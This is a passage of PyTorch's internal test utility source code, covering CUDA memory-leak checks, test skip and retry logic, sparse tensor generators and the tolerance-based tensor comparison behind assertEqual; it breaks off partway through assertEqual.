def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
# NOTE: driver API discrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Failed to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU nor CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
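# For example (illustrative): comparing two bfloat16 CPU tensors yields torch.float32,
# because both inputs are remapped to float32 before promote_types is applied:
# get_comparison_dtype(torch.ones(2, dtype=torch.bfloat16), torch.ones(2, dtype=torch.bfloat16))
# -> torch.float32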
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, so it seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to terminate the test suite early if an unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# A CUDA device-side error will cause subsequent test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keep objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
where counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built on
a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has an equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz constraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appears to give the exact result for all x values
# less than 2**35 at least; the precise upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
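# Illustrative sketch (hypothetical helper, never called by the framework): a
# worked example of the sawtooth counts model described in the docstring above.
# For n_rows = 6 and n_cols = 3 the "simplest case" formula
#     counts = arange(n_rows + 1) % (n_cols + 1)
# gives counts = [0, 1, 2, 3, 0, 1, 2], i.e. nnz = 9, and cumsum(counts)
# yields crow_indices = [0, 1, 3, 6, 6, 7, 9].
def _sawtooth_counts_example():
    n_rows, n_cols = 6, 3
    counts = torch.arange(n_rows + 1) % (n_cols + 1)
    crow_indices = counts.cumsum(dim=0)
    return counts, crow_indices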
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor([nnz], device=device, dtype=dtype, low=low, high=high)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
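# Illustrative usage sketch (hypothetical test body): compare torch.exp against
# np.exp on a plain Python list. device and dtype are only needed here because
# the input is not already a tensor.
def _example_compare_with_numpy(self):
    self.compare_with_numpy(torch.exp, np.exp, [0.0, 1.0, 2.0],
                            device='cpu', dtype=torch.float32)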
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
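# Worked example (illustrative, hypothetical helper): when a float16 result is
# compared against a float32 reference, the looser entry of the two rows above
# wins per component, i.e. rtol = max(1e-3, 1.3e-6) = 1e-3 and
# atol = max(1e-5, 1e-5) = 1e-5.
def _example_default_tolerances(self):
    return self._getDefaultRtolAndAtol(torch.float16, torch.float32)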
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages based on the internal debug message and the user-provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
